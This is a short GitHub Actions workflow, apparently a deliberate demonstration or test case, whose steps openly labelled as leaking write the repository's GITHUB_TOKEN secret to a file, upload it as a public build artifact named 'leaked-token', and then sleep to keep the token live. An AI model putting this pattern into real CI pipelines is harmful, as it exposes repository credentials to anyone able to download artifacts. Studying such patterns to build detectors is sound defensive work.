name: CI Workflow

on: pull_request

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout repository
        uses: actions/checkout@v2

      - name: Build the project
        run: echo "Building project..."

      - name: Leaking Token via Artifacts
        run: echo ${{ secrets.GITHUB_TOKEN }} > token.txt

      - name: Upload Artifact (Token)
        uses: actions/upload-artifact@v4
        with:
          name: leaked-token
          path: token.txt

      - name: Final Step
        run: echo "Final step of the workflow" && sleep 30
